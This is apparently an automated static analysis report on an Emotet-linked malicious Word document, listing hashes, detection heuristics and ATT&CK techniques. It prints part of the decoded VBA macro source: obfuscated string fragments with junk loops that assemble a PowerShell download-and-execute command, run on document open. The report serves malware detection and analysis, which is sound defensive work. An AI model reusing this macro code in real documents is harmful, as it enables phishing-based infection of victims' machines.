Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ac7124752e441b42…

MALICIOUS

Office (OLE)

Size: 114.2 KB
Created: 2018-06-21 09:08:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 5516455b01444fa907ef91f30cb128af
SHA-1: d8baae5553638d76b44cb97175d3d7537884bd0c
SHA-256: ac7124752e441b428ca62558a3f062a84b88589ddc9fa2fa6ea3fb8675fadf02
Risk score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen function that calls Shell(). The script attempts to construct a PowerShell command by concatenating strings, likely to download and execute a second-stage payload. The ClamAV detection and the presence of Shell() and AutoOpen heuristics strongly indicate a downloader, consistent with the Emotet family.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6891476-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6891476-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13635 bytes
SHA-256: 82fe9f499b9aeb37c17ce8d7236b622a4035b23da7a8e815a4194adfda6de4ee

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GNfciXr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oBKsGPGq"
Function ZVimKZ()
On Error Resume Next
For Each wXsju In chAcU
LmWKb = (SDjJzq * 22397 + 80506 * CInt(UiLZz - CDbl(72313)) * 15081 * Oct(58691))
BVEwH = 5897 + Atn(79090) / 5667 / Round(41080) / 59661 / CInt(HXqBF)
UaqmMC = lNKaHj = OXAjjm
Next
GiafdP = "OwerSH" + "ell " + "ieX(" + Chr(34) + "$(sV 'of" + "s'  '' )" + Chr(34) + " +[" + "STrInG]( '1" + "5x77-81I95>" + "124O96I" + "92O11x22-1" + "1-69!78"
For Each qdYNcB In IltwC
CasaSF = (nEzwis * 60109 + 44482 * CInt(MuNSUs - CDbl(6092)) * 27120 * Oct(21048))
fkWsJY = 96831 + Atn(67372) / 69350 / Round(58713) / 19112 / CInt(iPtlv)
TpqWJ = AWccPw = vTsmi
Next
LqPvlKkJQrR = "J92>6J68>73" + "-65>78-72t9" + "5t11x89t74!69O7" + "9>68t70-16-15" + ">92J64-89x1"
For Each hpEhVC In jQXRwb
Ymfoz = (hwLJQr * 36133 + 8511 * CInt(jdKYvE - CDbl(78929)) * 45122 * Oct(96534))
Qijqwj = 87724 + Atn(13527) / 49869 / Round(60841) / 3698 / CInt(OhaizI)
TzZIb = lCDzr = FnwPjd
Next
zOzYv = "22" + "t114!11J22" + "t11!69O78x92" + "t6-68-73t65" + "-78>72" + "J95H1" + "1>120t82!88"
For Each ksioPF In vYXZjU
chkjH = (YhKLXB * 29587 + 55464 * CInt(iJzHt - CDbl(87318)) * 5877 * Oct(73161))
RNpQs = 87350 + Atn(27475) / 51290 / Round(48909) / 52779 / CInt(ZvvPV)
UlEnVj = zhYmz = ushRCh
Next
XQAQOXQS = "t95H78>7" + "0-" + "5O101-78!9" + "5>5x124V78J73!" + "104I71t66-78" + "!69x95" + "O1" + "6H15I" + "97" + "x88t94t74>6"
For Each lMaLY In qqDoO
ZcqVT = (Hvnvb * 40893 + 49196 * CInt(FGNEu - CDbl(60001)) * 43569 * Oct(20666))
kFmwPk = 55912 + Atn(98852) / 88143 / Round(68563) / 68830 / CInt(wzNLi)
qHHtsz = oEzUzz = EcXHai
Next
ckXJaz = "6>11x2" + "2I11>" + "12x67x95H95>91" + "x17O4H4I" + "79x68>89" + "J68-95x67J" + "82I7" + "6V66I71J88t95" + ">89t74"
For Each wNGXV In aGfJc
XvcpG = (VudOz * 79421 + 20803 * CInt(kkDbq - CDbl(31174)) * 88145 * Oct(86201))
hPRMGU = 80526 + Atn(6356) / 7071 / Round(35764) / 23141 / CInt(iRGGtS)
VjNjjY = EUXWM = nGtLqj
Next
OwBjKbc = "V9" + "1O5O72x68" + "H70!4I" + "71" + "-100J111" + "O70x4I107!67J9" + "5I95J"
For Each WUKdSo In wzwii
KHzFS = (dLiFB * 2802 + 21416 * CInt(hWjAzt - CDbl(4649)) * 25011 * Oct(32304))
PIbHuW = 49794 + Atn(31739) / 92894 / Round(66252) / 72354 / CInt(zqaTT)
mwYCY = GVnmSX = Anspc
Next
NHzpSzvUvN = "91t17" + "I4>4t92J" + "92J92" + "O5!7" + "0t82I91H67!74" + ">70I70I"
For Each anpwfN In aKCfN
DZZBO = (rdjwc * 19853 + 74595 * CInt(PVjth - CDbl(37529)) * 30857 * Oct(27312))
oNotLI = 10867 + Atn(56668) / 18574 / Round(97497) / 87623 / CInt(pkblkv)
zQdOiT = Wkjah = YoMJbw
Next
DMTWa = "68O72H67V7" + "4t5!72" + "O68>70J4!102!" + "106" + "O25I" + "77t121O30>106O" + "4J107V67J95O95" + "-91!17" + "I4>4t92" + "t92-92"
ZVimKZ = GiafdP + LqPvlKkJQrR + zOzYv + XQAQOXQS + ckXJaz + OwBjKbc + NHzpSzvUvN + DMTWa
End Function
Function ZaUUl()
On Error Resume Next
For Each JUbrb In USwrj
rRTAk = (kDZOiN * 72897 + 80125 * CInt(rMwDbN - CDbl(35399)) * 78612 * Oct(50210))
vmOFlc = 54961 + Atn(11567) / 399 / Round(76679) / 10437 / CInt(ZctmO)
VNhqq = lcaBa = krJAs
Next
GnuwowA = "J5!71-" + "66" + ">74H74" + "-88!88>68I7" + "2x66I74I95H78t" + "5x72" + "I68t70!4I9"
For Each CMjFw In LnJVcF
aUitnz = (bEOkI * 95844 + 44929 * CInt(czczd - CDbl(89671)) * 96583 * Oct(62691))
wwwwNv = 21440 + Atn(22374) / 86857 / Round(58349) / 54403 / CInt(cniCw)
qpduz = Gduti = qjFnzm
Next
FKidfMXQuzX = "8-94!24V90I67H7" + "7!104H4>1" + "07H67x95I95>91" + "!1"
For Each VimHG In EsZlO
KfIAi = (tqQzm * 14025 + 26130 * CInt(StCCIj - CDbl(13320)) * 34660 * Oct(54468))
WritG = 90721 + Atn(22295) / 80342 / Round(45480) / 56825 / CInt(QsCzor)
Lqsju = VZzVU = sbFjJH
Next
NFQtm = "7I4I4" + "I95H" + "78>8" + "8!95>5!79O66O89" + "O64" + "!9" + "5x94I66H9" + "1x5" + "t69-71>4-"
For Each KwviN In rfVBa
bWwNGQ = (wloiiz * 91548 + 2
... (truncated)